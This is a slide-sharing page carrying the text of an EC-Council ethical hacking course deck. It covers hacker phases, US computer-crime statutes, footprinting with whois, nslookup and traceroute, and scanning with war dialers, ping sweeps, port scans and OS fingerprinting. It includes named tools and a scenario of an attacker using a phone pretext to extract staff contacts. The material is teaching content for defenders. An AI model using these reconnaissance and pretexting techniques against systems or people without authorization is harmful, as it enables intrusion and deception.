Selenium ppt
PPTX
Subdomain Enumeration
PDF
An Introduction to Test Driven Development
VAPT - Vulnerability Assessment & Penetration Testing
The Future of Cyber Security
Web Application Security
The 15 ITIL Steps to DBaaS in the Cloud
Test Automation - Keytorc Approach
Computer virus
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
Requirement for creating a Penetration Testing Lab
WannaCry / Wannacrypt Ransomware
Kali Linux
Virtualization
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021
Testing capability ppt
OWASP Secure Coding
Burp suite
Selenium ppt
Subdomain Enumeration
An Introduction to Test Driven Development

Similar to EN-Ethical Hacking.pdf (20)

PDF
Ceh v5 module 01 introduction to ethical hacking
DOCX
Ethical hacking
PPTX
Ethical hacking
DOCX
61370436 main-case-study
PPTX
Ethical Hacking
DOCX
Ethical hacking
PPT
Ethical hacking presentation
PPTX
Ethical_Hacking
PPTX
Hacking.pptx
DOCX
Final report ethical hacking
PDF
UNIT - I in Engineering Subjects Ethical Hacking Subject
PDF
Ethical Hacking A high-level information security study on protecting a comp...
PPTX
Web security chapter#2
PPT
Hacking
PPTX
ethical hacking
PPTX
PDF
Module 1 (legality)
PDF
Vulnerability Prevention Using Ethical Hacking.pdf
PPTX
building foundation for ethical hacking.ppt
PPTX
Ethical hacking
Ceh v5 module 01 introduction to ethical hacking
Ethical hacking
Ethical hacking
61370436 main-case-study
Ethical Hacking
Ethical hacking
Ethical hacking presentation
Ethical_Hacking
Hacking.pptx
Final report ethical hacking
UNIT - I in Engineering Subjects Ethical Hacking Subject
Ethical Hacking A high-level information security study on protecting a comp...
Web security chapter#2
Hacking
ethical hacking
Module 1 (legality)
Vulnerability Prevention Using Ethical Hacking.pdf
building foundation for ethical hacking.ppt
Ethical hacking

Recently uploaded (20)

PPTX
modul_python (1).pptx for professional and student
PDF
BF and FI - Blockchain, fintech and Financial Innovation Lesson 2.pdf
PPTX
mbdjdhjjodule 5-1 rhfhhfjtjjhafbrhfnfbbfnb
PDF
.pdf is not working space design for the following data for the following dat...
PPTX
STERILIZATION AND DISINFECTION-1.ppthhhbx
PPTX
Introduction to Basics of Ethical Hacking and Penetration Testing -Unit No. 1...
PPT
Reliability_Chapter_ presentation 1221.5784
PPT
ISS -ESG Data flows What is ESG and HowHow
PPTX
Computer network topology notes for revision
PDF
annual-report-2024-2025 original latest.
PPT
Miokarditis (Inflamasi pada Otot Jantung)
PPTX
Introduction-to-Cloud-ComputingFinal.pptx
PDF
Data Engineering Interview Questions & Answers Cloud Data Stacks (AWS, Azure,...
PDF
Optimise Shopper Experiences with a Strong Data Estate.pdf
PPTX
Supervised vs unsupervised machine learning algorithms
PDF
168300704-gasification-ppt.pdfhghhhsjsjhsuxush
PPTX
IB Computer Science - Internal Assessment.pptx
PPTX
Introduction to Firewall Analytics - Interfirewall and Transfirewall.pptx
PDF
Clinical guidelines as a resource for EBP(1).pdf
PDF
Business Analytics and business intelligence.pdf
modul_python (1).pptx for professional and student
BF and FI - Blockchain, fintech and Financial Innovation Lesson 2.pdf
mbdjdhjjodule 5-1 rhfhhfjtjjhafbrhfnfbbfnb
.pdf is not working space design for the following data for the following dat...
STERILIZATION AND DISINFECTION-1.ppthhhbx
Introduction to Basics of Ethical Hacking and Penetration Testing -Unit No. 1...
Reliability_Chapter_ presentation 1221.5784
ISS -ESG Data flows What is ESG and HowHow
Computer network topology notes for revision
annual-report-2024-2025 original latest.
Miokarditis (Inflamasi pada Otot Jantung)
Introduction-to-Cloud-ComputingFinal.pptx
Data Engineering Interview Questions & Answers Cloud Data Stacks (AWS, Azure,...
Optimise Shopper Experiences with a Strong Data Estate.pdf
Supervised vs unsupervised machine learning algorithms
168300704-gasification-ppt.pdfhghhhsjsjhsuxush
IB Computer Science - Internal Assessment.pptx
Introduction to Firewall Analytics - Interfirewall and Transfirewall.pptx
Clinical guidelines as a resource for EBP(1).pdf
Business Analytics and business intelligence.pdf

EN-Ethical Hacking.pdf

  • 2. EC-Council Introductions ~ Name ~ Company Affiliation ~ Title / Function ~ Job Responsibility ~ System security related experience ~Expectations
  • 3. EC-Council Course Materials ~ Identity Card ~ Student Courseware ~ Lab Manual / Workbook ~ Compact Disc ~ Course Evaluation ~ Reference Materials
  • 4. EC-Council Course Outline ~ Module I : Introduction to Ethical Hacking ~ Module II: Footprinting ~ Module III: Scanning ~ Module IV: Enumeration ~ Module V: System Hacking
  • 5. EC-Council Course Outline (contd..) ~ Module VI: Trojans and Backdoors ~ Module VII: Sniffers ~ Module VIII: Denial of Service ~ Module IX: Social Engineering ~ Module X: Session Hijacking
  • 6. EC-Council Course Outline (contd..) ~ Module XI: Hacking Web Servers ~ Module XII: Web Application Vulnerabilities ~ Module XIII: Web Based Password Cracking Techniques ~ Module XIV: SQL Injection ~ Module XV: Hacking Wireless Networks
  • 7. EC-Council Course Outline (contd..) ~ Module XVI: Viruses ~ Module XVII: Novell Hacking ~ Module XVIII: Linux Hacking ~ Module XIX: Evading IDS, Firewalls and Honey pots ~ Module XX: Buffer Overflows ~ Module XXI: Cryptography
  • 8. EC-Council EC-Council Certified e- business Certification Program There are five e-Business certification tracks under EC-Council Accreditation body: • 1. Certified e-Business Associate • 2. Certified e-Business Professional • 3. Certified e-Business Consultant • 4. E++ Certified Technical Consultant • 5. Certified Ethical Hacker
  • 10. EC-Council Student Facilities Building Hours Phones Parking Messages Restrooms Smoking Recycling Meals Class Hours
  • 11. EC-Council Lab Sessions ~ Lab Sessions are designed to reinforce the classroom sessions ~ The sessions are intended to give a hands on experience only and does not guarantee proficiency.
  • 13. EC-Council Module Objective ~ Understanding the importance of security ~ Introducing ethical hacking and essential terminology for the module ~ Understanding the different phases involved in an exploit by a hacker ~ Overview of attacks and identification of exploit categories ~ Comprehending ethical hacking ~ Legal implications of hacking ~ Hacking, law and punishment
  • 14. EC-Council Problem Definition – Why Security? ~ Evolution of technology focused on ease of use ~ Increasing complexity of computer infrastructure administration and management ~ Decreasing skill level needed for exploits ~ Direct impact of security breach on corporate asset base and goodwill ~ Increased networked environment and network based applications
  • 15. EC-Council Can Hacking Be Ethical? ~ The noun ‘hacker’ refers to a person who enjoys learning the details of computer systems and stretch their capabilities. ~ The verb ‘hacking’ describes the rapid development of new programs or the reverse engineering of already existing software to make the code better, and efficient. ~ The term ‘cracker’ refers to a person who uses his hacking skills for offensive purposes. ~ The term ‘ethical hacker’ refers to security professionals who apply their hacking skills for defensive purposes.
  • 16. EC-Council Essential Terminology ~ Threat – An action or event that might prejudice security. A threat is a potential violation of security. ~ Vulnerability – Existence of a weakness, design, or implementation error that can lead to an unexpected, undesirable event compromising the security of the system. ~ Target of Evaluation – An IT system, product, or component that is identified/subjected as requiring security evaluation. ~ Attack – An assault on system security that derives from an intelligent threat. An attack is any action that violates security. ~ Exploit – A defined way to breach the security of an IT system through vulnerability.
  • 17. EC-Council Elements of Security ~ Security is a state of well-being of information and infrastructures in which the possibility of successful yet undetected theft, tampering, and disruption of information and services is kept low or tolerable ~ Any hacking event will affect any one or more of the essential security elements. ~ Security rests on confidentiality, authenticity, integrity, and availability • Confidentiality is the concealment of information or resources. • Authenticity is the identification and assurance of the origin of information. • Integrity refers to the trustworthiness of data or resources in terms of preventing improper and unauthorized changes. • Availability refers to the ability to use the information or resource desired
  • 18. EC-Council What Does a Malicious Hacker Do? ~Reconnaissance • Active / passive ~Scanning ~Gaining access • Operating system level / application level • Network level • Denial of service ~Maintaining access • Uploading / altering / downloading programs or data ~Covering tracks Clearing Tracks Maintaining Access Gaining Access Scanning Reconnaissance
  • 19. EC-Council Phase 1 - Reconnaissance ~ Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack. It involves network scanning either external or internal without authorization ~ Business Risk – ‘Notable’ – Generally noted as a "rattling the door knobs" to see if someone is watching and responding. Could be future point of return when noted for ease of entry for an attack when more is known on a broad scale about the target.
  • 20. EC-Council Phase 1 - Reconnaissance (contd.) ~ Passive reconnaissance involves monitoring network data for patterns and clues. • Examples include sniffing, information gathering etc. ~ Active reconnaissance involves probing the network to detect • accessible hosts • open ports • location of routers • details of operating systems and services
  • 21. EC-Council Phase 2 - Scanning ~ Scanning refers to pre-attack phase when the hacker scans the network with specific information gathered during reconnaissance. ~ Business Risk – ‘High’ – Hackers have to get a single point of entry to launch an attack and could be point of exploit when vulnerability of the system is detected. ~ Scanning can include use of dialers, port scanners, network mapping, sweeping, vulnerability scanners etc.
  • 22. EC-Council Phase 3 - Gaining Access ~ Gaining Access refers to the true attack phase. The hacker exploits the system. ~ The exploit can occur over a LAN, locally, Internet, offline, as a deception or theft. Examples include stack- based buffer overflows, denial of service, session hijacking, password filtering etc. ~ Influencing factors include architecture and configuration of target system, skill level of the perpetrator and initial level of access obtained. ~ Business Risk – ‘Highest’ - The hacker can gain access at operating system level, application level or network level.
  • 23. EC-Council Phase 4 - Maintaining Access ~ Maintaining Access refers to the phase when the hacker tries to retain his ‘ownership’ of the system. ~ The hacker has exploited a vulnerability and can tamper and compromise the system. ~ Sometimes, hackers harden the system from other hackers as well (to own the system) by securing their exclusive access with Backdoors, RootKits, Trojans and Trojan horse Backdoors. ~ Hackers can upload, download or manipulate data / applications / configurations on the ‘owned’ system.
  • 24. EC-Council Phase 5 - Covering Tracks ~ Covering Tracks refers to the activities undertaken by the hacker to extend his misuse of the system without being detected. ~ Reasons include need for prolonged stay, continued use of resources, removing evidence of hacking, avoiding legal action etc. ~ Examples include Steganography, tunneling, altering log files etc. ~ Hackers can remain undetected for long periods or use this phase to start a fresh reconnaissance to a related target system.
  • 25. EC-Council Hacker Classes ~Black hats • Individuals with extraordinary computing skills, resorting to malicious or destructive activities. Also known as ‘Crackers.’ ~White Hats • Individuals professing hacker skills and using them for defensive purposes. Also known as ‘Security Analysts’. ~Gray Hats • Individuals who work both offensively and defensively at various times. ~Ethical Hacker Classes • Former Black Hats – Reformed crackers – First-hand experience – Lesser credibility perceived • White Hats – Independent security consultants (maybe groups as well) – Claims to be knowledgeable about black hat activities • Consulting Firms – Part of ICT firms – Good credentials
  • 26. EC-Council Hacktivism ~ Refers to ‘hacking with / for a cause’. ~ Comprises of hackers with a social or political agenda ~ Aims at sending across a message through their hacking activity and gaining visibility for their cause and themselves. ~ Common targets include government agencies, MNCs, or any other entity perceived as ‘bad’ or ‘wrong’ by these groups / individuals. ~ It remains a fact however, that gaining unauthorized access is a crime, no matter what the intent.
  • 27. EC-Council What do Ethical Hackers do? ~ “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” – – Sun Tzu, Art of War ~ Ethical hackers tries to answer: • What can the intruder see on the target system? (Reconnaissance and Scanning phase of hacking) • What can an intruder do with that information? (Gaining Access and Maintaining Access phases) • Does anyone at the target notice the intruders attempts or success? (Reconnaissance and Covering Tracks phases) ~ If hired by any organization, an ethical hacker asks the organization what it is trying to protect, against whom and what resources it is willing to expend in order to gain protection.
  • 28. EC-Council Skill Profile of an Ethical Hacker ~ Computer expert adept at technical domains. ~ In-depth knowledge about target platforms (such as windows, Unix, Linux). ~ Exemplary knowledge in networking and related hardware / software. ~ Knowledgeable about security areas and related issues – though not necessarily a security professional.
  • 29. EC-Council How do they go about it? ~ Any security evaluation involves three components: ~ Preparation – In this phase, a formal contract is signed that contains a non-disclosure clause as well as a legal clause to protect the ethical hacker against any prosecution that he may attract during the conduct phase. The contract also outlines infrastructure perimeter, evaluation activities, time schedules and resources available to him. ~ Conduct – In this phase, the evaluation technical report is prepared based on testing potential vulnerabilities. ~ Conclusion – In this phase, the results of the evaluation is communicated to the organization / sponsors and corrective advise / action is taken if needed.
  • 30. EC-Council Modes of Ethical Hacking ~ Remote network – This mode attempts to simulate an intruder launch an attack over the Internet. ~ Remote dial-up network - This mode attempts to simulate an intruder launching an attack against the client’s modem pools. ~ Local network – This mode simulates an employee with legal access gaining unauthorized access over the local network. ~ Stolen equipment – This mode simulates theft of a critical information resource such as a laptop owned by a strategist, (taken by the client unaware of its owner and given to the ethical hacker). ~ Social engineering – This aspect attempts to check the integrity of the organization’s employees. ~ Physical entry – This mode attempts to physically compromise the organization’s ICT infrastructure.
  • 31. EC-Council Security Testing ~ There are many different forms of security testing. Examples include vulnerability scanning, ethical hacking and penetration testing. Security testing can be conducted using one of two approaches: ~ Black-box (with no prior knowledge of the infrastructure to be tested) ~ White-box (with a complete knowledge of the network infrastructure). ~ Internal Testing is also known as Gray-box testing and this examines the extent of access by insiders within the network.
  • 32. EC-Council Deliverables ~ Ethical Hacking Report ~ Details the results of the hacking activity, matching it against the work schedule decided prior to the conduct phase. ~ Vulnerabilities are detailed and avoidance measures suggested. Usually delivered in hard copy format for security reasons. ~ Issues to consider – Nondisclosure clause in the legal contract - availing the right information to the right person), integrity of the evaluation team, sensitivity of information.
  • 33. EC-Council Computer Crimes and Implications ~ Cyber Security Enhancement Act 2002 – implicates life sentences for hackers who ‘recklessly’ endanger the lives of others. ~ The CSI/FBI 2002 Computer Crime and Security Survey noted that 90% of the respondents acknowledged security breaches, but only 34% reported the crime to law enforcement agencies. ~ The FBI computer crimes squad estimates that between 85 to 97 percent of computer intrusions are not even detected. ~ Stigma associated with reporting security lapses
  • 34. EC-Council Legal Perspective (US Federal Law) Federal Criminal Code Related to Computer Crime: ~ 18 U.S.C. § 1029. Fraud and Related Activity in Connection with Access Devices ~ 18 U.S.C. § 1030. Fraud and Related Activity in Connection with Computers ~ 18 U.S.C. § 1362. Communication Lines, Stations, or Systems ~ 18 U.S.C. § 2510 et seq. Wire and Electronic Communications Interception and Interception of Oral Communications ~ 18 U.S.C. § 2701 et seq. Stored Wire and Electronic Communications and Transactional Records Access
  • 35. EC-Council Section 1029 Subsection (a) Whoever - (1) knowingly and with intent to defraud produces, uses, or traffics in one or more counterfeit access devices; (2) knowingly and with intent to defraud traffics in or uses one or more unauthorized access devices during any one-year period, and by such conduct obtains anything of value aggregating $1,000 or more during that period; (3) knowingly and with intent to defraud possesses fifteen or more devices which are counterfeit or unauthorized access devices; (4) knowingly, and with intent to defraud, produces, traffics in, has control or custody of, or possesses device-making equipment;
  • 36. EC-Council Section 1029 (contd.) (5) knowingly and with intent to defraud effects transactions, with 1 or more access devices issued to another person or persons, to receive payment or any other thing of value during any 1-year period the aggregate value of which is equal to or greater than $1,000; (6) without the authorization of the issuer of the access device, knowingly and with intent to defraud solicits a person for the purpose of— (A) offering an access device; or (B) selling information regarding or an application to obtain an access device; (7) knowingly and with intent to defraud uses, produces, traffics in, has control or custody of, or possesses a telecommunications instrument that has been modified or altered to obtain unauthorized use of telecommunications services;
  • 37. EC-Council Section 1029 (contd.) (8) knowingly and with intent to defraud uses, produces, traffics in, has control or custody of, or possesses a scanning receiver; (9) knowingly uses, produces, traffics in, has control or custody of, or possesses hardware or software, knowing it has been configured to insert or modify telecommunication identifying information associated with or contained in a telecommunications instrument so that such instrument may be used to obtain telecommunications service without authorization; or (10) without the authorization of the credit card system member or its agent, knowingly and with intent to defraud causes or arranges for another person to present to the member or its agent, for payment, 1 or more evidences or records of transactions made by an access device.
  • 38. EC-Council Penalties (A) in the case of an offense that does not occur after a conviction for another offense under this section-- • (i) if the offense is under paragraph (1), (2), (3), (6), (7), or (10) of subsection (a), a fine under this title or imprisonment for not more than 10 years, or both; and • (ii) if the offense is under paragraph (4), (5), (8), or (9) of subsection (a), a fine under this title or imprisonment for not more than 15 years, or both; (B) in the case of an offense that occurs after a conviction for another offense under this section, a fine under this title or imprisonment for not more than 20 years, or both; and (C) in either case, forfeiture to the United States of any personal property used or intended to be used to commit the offense.
  • 39. EC-Council Section 1030 – (a) (1) Subsection (a) Whoever-- (1) having knowingly accessed a computer without authorization or exceeding authorized access, and by means of such conduct having obtained information that has been determined by the United States Government pursuant to an Executive order or statute to require protection against unauthorized disclosure for reasons of national defense or foreign relations, or any restricted data, as defined in paragraph y of section 11 of the Atomic Energy Act of 1954, with reason to believe that such information so obtained could be used to the injury of the United States, or to the advantage of any foreign nation willfully communicates, delivers, transmits, or causes to be communicated, delivered, or transmitted, or attempts to communicate, deliver, transmit or cause to be communicated, delivered, or transmitted the same to any person not entitled to receive it, or willfully retains the same and fails to deliver it to the officer or employee of the United States entitled to receive it;
  • 40. EC-Council Section 1030 (2) (A) (B) (C) (2) intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains-- (A) information contained in a financial record of a financial institution, or of a card issuer as defined in section 1602(n) of title 15, or contained in a file of a consumer reporting agency on a consumer, as such terms are defined in the Fair Credit Reporting Act (15 U.S.C. 1681 et seq.); (B) information from any department or agency of the United States; or (C) information from any protected computer if the conduct involved an interstate or foreign communication;
  • 41. EC-Council Section 1030 (3) (4) (3) intentionally, without authorization to access any nonpublic computer of a department or agency of the United States, accesses such a computer of that department or agency that is exclusively for the use of the Government of the United States or, in the case of a computer not exclusively for such use, is used by or for the Government of the United States and such conduct affects that use by or for the Government of the United States; (4) knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value, unless the object of the fraud and the thing obtained consists only of the use of the computer and the value of such use is not more than $5,000 in any 1- year period;
  • 42. EC-Council Section 1030 (5) (A) (B) (5)(A)(i) knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer; (ii) intentionally accesses a protected computer without authorization, and as a result of such conduct, recklessly causes damage; or (iii) intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage; and (5)(B) by conduct described in clause (i), (ii), or (iii) of subparagraph (A), caused (or, in the case of an attempted offense, would, if completed, have caused)--
  • 43. EC-Council Section 1030 (5) (B) (contd.) (i) loss to 1 or more persons during any 1-year period (and, for purposes of an investigation, prosecution, or other proceeding brought by the United States only, loss resulting from a related course of conduct affecting 1 or more other protected computers) aggregating at least $5,000 in value; (ii) the modification or impairment, or potential modification or impairment, of the medical examination, diagnosis, treatment, or care of 1 or more individuals; (iii) physical injury to any person; (iv) a threat to public health or safety; or (v) damage affecting a computer system used by or for a government entity in furtherance of the administration of justice, national defense, or national security;
  • 44. EC-Council Section 1030 (6) (7) (6) knowingly and with intent to defraud traffics (as defined in section 1029) in any password or similar information through which a computer may be accessed without authorization, if-- (A) such trafficking affects interstate or foreign commerce; or (B) such computer is used by or for the Government of the United States; (7) with intent to extort from any person any money or other thing of value, transmits in interstate or foreign commerce any communication containing any threat to cause damage to a protected computer;
  • 45. EC-Council Penalties (1)(A) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(1) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and (B) a fine under this title or imprisonment for not more than twenty years, or both, in the case of an offense under subsection (a)(1) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; (2)(A) except as provided in subparagraph (B), a fine under this title or imprisonment for not more than one year, or both, in the case of an offense under subsection (a)(2), (a)(3), (a)(5)(A)(iii), or (a)(6) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;
  • 46. EC-Council Penalties (contd.) ~ (B) a fine under this title or imprisonment for not more than 5 years, or both, in the case of an offense under subsection (a)(2), or an attempt to commit an offense punishable under this subparagraph, if-- • (i) the offense was committed for purposes of commercial advantage or private financial gain; • (ii) the offense was committed in furtherance of any criminal or tortuous act in violation of the Constitution or laws of the United States or of any State; or • (iii) the value of the information obtained exceeds $5,000; ~ (C) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(2), (a)(3) or (a)(6) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;
  • 47. EC-Council Penalties (contd.) (3)(A) a fine under this title or imprisonment for not more than five years, or both, in the case of an offense under subsection (a)(4) or (a)(7) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and (3)(B) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and
  • 48. EC-Council Penalties (contd.) (4)(A) a fine under this title, imprisonment for not more than 10 years, or both, in the case of an offense under subsection (a)(5)(A)(i), or an attempt to commit an offense punishable under that subsection; (4)(B) a fine under this title, imprisonment for not more than 5 years, or both, in the case of an offense under subsection (a)(5)(A)(ii), or an attempt to commit an offense punishable under that subsection; (4)(C) a fine under this title, imprisonment for not more than 20 years, or both, in the case of an offense under subsection (a)(5)(A)(i) or (a)(5)(A)(ii), or an attempt to commit an offense punishable under either subsection, that occurs after a conviction for another offense under this section.
  • 49. EC-Council Summary ~ Security is critical across sectors and industries. ~ Ethical Hacking is a methodology to simulate a malicious attack without causing damage. ~ Hacking involves five distinct phases. ~ Security evaluation includes preparation, conduct and evaluation phases. ~ Cyber crime can be differentiated into two categories. ~ U.S. Statutes ξ 1029 and 1030 primarily address cyber crime.
  • 51. EC-Council Scenario Adam is furious. He had applied for the network engineer job at targetcompany.com He believes that he was rejected unfairly. He has a good track record, but the economic slowdown has seen many layoffs including his. He is frustrated – he needs a job and feels he has been wronged. Late in the evening he decides that he will prove his mettle. ~ What do you think Adam would do? ~ Where would he start and how would he go about it? ~ Are there any tools that can help him in his effort? ~Can he cause harm to targetcompany.com? ~ As a security professional, where can you lay checkpoints and how can you deploy countermeasures?
  • 52. EC-Council Module Objectives ~ Overview of the Reconnaissance Phase ~ Introducing Footprinting ~ Understanding the information gathering methodology of hackers ~ Comprehending the Implications ~ Learning some of the tools used for reconnaissance phase ~ Deploying countermeasures
  • 53. EC-Council Revisiting Reconnaissance Clearing Tracks Maintaining Access Gaining Access Scanning Reconnaissance Clearing Tracks Maintaining Access Gaining Access Scanning Reconnaissance ~ Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack. ~ It involves network scanning either external or internal without authorization.
  • 54. EC-Council Defining Footprinting ~ Footprinting is the blueprinting of the security profile of an organization, undertaken in a methodological manner. ~ Footprinting is one of the three pre-attack phases. The others are scanning and enumeration. ~ Footprinting results in a unique organization profile with respect to networks (Internet / Intranet / Extranet / Wireless) and systems involved.
  • 55. EC-Council Information Gathering Methodology ~ Unearth initial information ~ Locate the network range ~ Ascertain active machines ~ Discover open ports / access points ~ Detect operating systems ~ Uncover services on ports ~ Map the Network
  • 56. EC-Council Unearthing Initial Information ~Commonly includes: ~Domain name lookup ~Locations ~Contacts (Telephone / mail) ~Information Sources: ~Open source ~Whois ~Nslookup ~Hacking Tool: ~Sam Spade
  • 57. EC-Council Whois Registrant: targetcompany (targetcompany-DOM) # Street Address City, Province State, Pin, Country Domain Name: targetcompany.COM Domain servers in listed order: NS1.WEBHOST.COM XXX.XXX.XXX.XXX NS2.WEBHOST.COM XXX.XXX.XXX.XXX Administrative Contact: Surname, Name (SNIDNo-ORG) targetcompany@domain.com targetcompany (targetcompany-DOM) # Street Address City, Province, State, Pin, Country Telephone: XXXXX Fax XXXXX Technical Contact: Surname, Name (SNIDNo-ORG) targetcompany@domain.com targetcompany (targetcompany-DOM) # Street Address City, Province, State, Pin, Country Telephone: XXXXX Fax XXXXX
  • 58. EC-Council Nslookup ~ Nslookup is a program to query Internet domain name servers. Displays information that can be used to diagnose Domain Name System (DNS) infrastructure. ~ Helps find additional IP addresses if authoritative DNS is known from whois. ~ MX record reveals the IP of the mail server. ~ Both Unix and Windows come with a Nslookup client. ~ Third party clients are also available – E.g. Sam Spade
  • 59. EC-Council Scenario (contd.) Adam knows that targetcompany is based at NJ. However, he decides to check it up. He runs a whois from an online whois client and notes the domain information. He takes down the email ids and phone numbers. He also discerns the domain server IPs and does an interactive Nslookup. ~ Ideally. what extent of information should be revealed to Adam during this quest? ~ Are there any other means of gaining information? Can he use the information at hand in order to obtain critical information? ~What are the implications for the target company? Can he cause harm to targetcompany at this stage?
  • 60. EC-Council Locate the Network Range ~Commonly includes: ~Finding the range of IP addresses ~Discerning the subnet mask ~Information Sources: ~ARIN (American Registry of Internet Numbers) ~Traceroute ~Hacking Tool: ~NeoTrace ~Visual Route
  • 61. EC-Council ARIN ~ ARIN allows search on the whois database to locate information on networks autonomous system numbers (ASNs), network-related handles and other related point of contact (POC). ~ ARIN whois allows querying the IP address to help find information on the strategy used for subnet addressing.
  • 63. EC-Council Traceroute ~ Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live. ~ Traceroute reveals the path IP packets travel between two systems by sending out consecutive UDP packets with ever-increasing TTLs . ~ As each router processes a IP packet, it decrements the TTL. When the TTL reaches zero, it sends back a "TTL exceeded" message (using ICMP) to the originator. ~ Routers with DNS entries reveal the name of routers, network affiliation and geographic location.
  • 64. EC-Council Tool: NeoTrace (Now McAfee Visual Trace) NeoTrace shows the traceroute output visually – map view, node view and IP view
  • 66. EC-Council Tool: SmartWhois SmartWhois is a useful network information utility that allows you to find out all available information about an IP address, host name, or domain, including country, state or province, city, name of the network provider, administrator and technical support contact information Unlike standard Whois utilities, SmartWhois can find the information about a computer located in any part of the world, intelligently querying the right database and delivering all the related records within a few seconds.
  • 67. EC-Council Scenario (contd.) Adam makes a few searches and gets some internal contact information. He calls the receptionist and informs her that the HR had asked him to get in touch with a specific IT division personnel. It’s lunch hour, and he says he’ d rather mail to the person concerned than disturb him. He checks up the mail id on newsgroups and stumbles on an IP recording. He traces the IP destination. ~ What preventive measures can you suggest to check the availability of sensitive information? ~ What are the implications for the target company? Can he cause harm to targetcompany at this stage? ~ What do you think he can do with the information he has obtained?
  • 68. EC-Council Tool: VisualLookout VisualLookout provides high level views as well as detailed and historical views that provide traffic information in real-time or on a historical basis. In addition the user can request a "connections" window for any server, which provides a real-time view of all the active network connections showing ~who is connected, ~what service is being used, ~whether the connection is inbound or outbound, and ~how many connections are active and how long they have been connected.
  • 71. EC-Council Tool: eMailTrackerPro eMailTrackerPro is the e-mail analysis tool that enables analysis of an e-mail and its headers automatically and provides graphical results
  • 72. EC-Council Tool: Mail Tracking (mailtracking.com) Mail Tracking is a tracking service that allows the user to track when his mail was read, for how long and how many times. It also records forwards and passing of sensitive information (MS Office format)
  • 73. EC-Council Summary ~ Information gathering phase can be categorized broadly into seven phases. ~ Footprinting renders a unique security profile of a target system. ~ Whois, ARIN can reveal public information of a domain that can be leveraged further. ~ Traceroute and mail tracking can be used to target specific IP and later for IP spoofing. ~ Nslookup can reveal specific users and zone transfers can compromise DNS security.
  • 75. EC-Council EC-Council Scenario ~ Where do you think Tim should begin with his security initiative? ~ What would the first signs that his systems are under attack? Tim had got the much needed break he was looking for. He was going to be assisting the systems administrator of his division in securing their information systems. It was a dream come true for him as he was always interested in incident response. Tim began by browsing through the system architecture. Yes, they had the usual systems – firewall, mail server, NIDS and a couple of servers that were always up for remote users. At first sight, traffic seemed normal and there was nothing amiss. Anyway, he decided that he would just monitor the systems in his neighborhood for any abnormal activity.
  • 76. EC-Council Module Objective ~ Detecting ‘live’ systems on target network. ~ Discovering services running/ listening on target systems. ~ Understanding port scanning techniques. ~ Identifying TCP and UDP services running on target network. ~ Discovering the operating system ~ Understanding active and passive fingerprinting. ~ Automated discovery tools.
  • 77. EC-Council Detecting ‘Live’ Systems On Target Network Why? ~ To determine the perimeter of the target network /system ~ To facilitate network mapping ~ To build an inventory of accessible systems on target network Tools ~ War Dialers ~ Ping Utilities
  • 78. EC-Council War Dialers ~ A war dialer is a tool used to scan a large pool of telephone numbers to detect vulnerable modems to provide access to the system. ~ A demon dialer is a tool used to monitor a specific phone number and target its modem to gain access to the system. ~ Threat is high in systems with poorly configured remote access products providing entry to larger networks. ~ Tools include THC-Scan, ToneLoc, TBA etc.
  • 81. EC-Council Ping ~ Ping send out an ICMP Echo Request packet and awaits an ICMP Echo Reply message from an active machine. ~ Alternatively, TCP/UDP packets are sent if incoming ICMP messages are blocked. ~ Ping helps in assessing network traffic by time stamping each packet. ~ Ping can also be used for resolving host names. ~ Tools include Pinger, WS_Ping ProPack, NetScan Tools, HPing, icmpenum
  • 83. EC-Council Detecting Ping Sweeps Ping sweeps form a basic step in network mapping by polling network blocks and/or IP address ranges. Ping Utilities include: • WS_PingProPack (www.ipswitch.com) • NetScan Tools (www.nwpsw.com) • Hping (http://www.hping.org/download.html) • icmpenum (www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz) Ping Sweep Detection Utilities include: • Network based IDS (www.snort.org) • Genius (www.indiesoft.com) • BlackICE (www.networkice.com) • Scanlogd (www.openwall.com/scanlogd)
  • 84. EC-Council Discovering services running/ listening on target systems. Why? ~ To determine live hosts in the event of ICMP requests being blocked by host. ~ To identify potential ports for furthering the attack. ~ To understand specific applications / versions of a service. ~ To discover operating system details. Tools ~ Port Scanners
  • 85. EC-Council TCP three-way handshake 1. SYN sent from Client 2. SYN/ACK sent from Server 3. ACK sent from Client
  • 86. EC-Council Understanding Port Scanning Techniques ~Port Scanning is one of the most popular reconnaissance techniques used by hackers to discover services that can be compromised. ~A potential target computer runs many 'services' that listen at ‘well-known’ 'ports'. ~By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited. ~Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.
  • 87. EC-Council Port Scanning Techniques Port Scanning Techniques can be broadly classified into: ~ Open scan ~ Half- open scan ~ Stealth scan ~ Sweeps ~ Misc
  • 92. EC-Council Active Stack Fingerprinting ~ Fingerprinting is done to determine the remote OS ~ Allows attacker to leave smaller footprint and have greater chance to succeed ~ Based on the fact that various OS vendors implement the TCP stack differently ~ Specially crafted packets sent to remote OS and response is noted. This is compared with a database to determine the OS
